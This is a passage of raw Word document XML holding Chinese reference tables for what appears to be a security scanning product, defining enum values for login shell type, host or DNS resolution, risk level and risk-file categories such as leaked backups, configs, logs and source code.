          <w:p w14:paraId="2D2D073E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1684AECB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282095B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="051B97FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA2CC4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>非登录shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6FDCD3DE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B326F25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58DED0A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F6A9CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05B8E70F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="565" w:name="_Toc115166355"/>
      <w:bookmarkStart w:id="566" w:name="解析方式"/>
      <w:bookmarkEnd w:id="564"/>
      <w:r>
        <w:t>解析方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1064"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="66880A4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184E439" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023413E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22EC83C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B7B70A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BFE9A30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="416DE1DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F7E4DCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>host解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F92BBA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="699CFBC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4673BD9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="613DEBFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B35A35F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="_Toc115166356"/>
      <w:bookmarkStart w:id="568" w:name="风险文件危险等级"/>
      <w:bookmarkEnd w:id="566"/>
      <w:r>
        <w:t>风险文件危险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1249"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EF0817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3C96C13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5143D258" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E951B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="066D3E44" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BA49876" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0479D0F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5052755D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>低危</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36E9CB70" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27FA6323" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BBA048A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A4CFF45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D7D9668" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="422E6B91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E17864" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29D43838" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65FFFA5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="569" w:name="_Toc115166357"/>
      <w:bookmarkStart w:id="570" w:name="风险文件类型"/>
      <w:bookmarkEnd w:id="568"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>风险文件类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="569"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1207"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1407"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="310F4B6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28346873" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D97D31F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="448B5A2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CB6A5CB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32CBE30B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D1DAD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57C431C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>临时文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4FBF4960" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="260311F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED44967" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1110E21E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>压缩文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="661D822F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="786ED5B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F09D89F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C83170" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备份文件泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="250D27CB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15181F84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597DC7A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4960E3BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据文件泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DF253FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04BC6CB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BA282E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34842E55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>配置文件泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75F493B5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="648CD3F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09ACC0BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436ADEDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>日志泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0199C06D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D37546" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4546D546" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4970A5E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>脚本泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DCA55FE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0277D4D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A2CFB45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AB07020" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Office文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1BACD970" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7651A6FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3580678B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A111059" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>源代码泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C5034DA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511E4C84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="126A51F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D6A3A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DACEA9E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C084F1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05CFBCB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D868BC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>phpinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DB1985F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="_Toc115166358"/>
      <w:bookmarkStart w:id="572" w:name="漏洞类型"/>
      <w:bookmarkEnd w:id="570"/>
      <w:r>
        <w:t>漏洞类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="571"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1053"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1839"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="47198F2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12F60C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
